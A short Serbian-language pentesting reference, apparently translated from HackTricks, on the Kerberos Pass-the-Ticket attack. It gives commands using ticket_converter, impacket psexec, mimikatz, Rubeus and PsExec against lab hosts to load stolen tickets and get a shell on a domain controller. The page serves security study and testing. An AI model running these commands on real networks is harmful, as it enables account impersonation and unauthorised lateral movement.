Koristite Trickest da lako izgradite i automatizujete radne tokove pokretane najnaprednijim alatima zajednice na svetu. Dobijte pristup danas:

Prosledi Kartu (PTT)

U metodi napada Prosledi Kartu (PTT), napadači ukradu autentikacionu kartu korisnika umesto njihove lozinke ili vrednosti heša. Ova ukradena karta se zatim koristi da se predstave kao korisnik, stičući neovlašćen pristup resursima i uslugama unutar mreže.

Pročitaj:

• Berba karata sa Windows-a

• Berba karata sa Linux-a

Zamena Linux i Windows karata između platformi

Alat ticket_converter konvertuje formate karata koristeći samo samu kartu i izlazni fajl.

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

Napad prenošenjem tiketa

U Windows-u se može koristiti Kekeo.

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

Reference

• https://www.tarlogic.com/blog/how-to-attack-kerberos/

Koristite Trickest da biste lako izgradili i automatizovali radne tokove pokretane najnaprednijim alatima zajednice na svetu. Pristupite danas: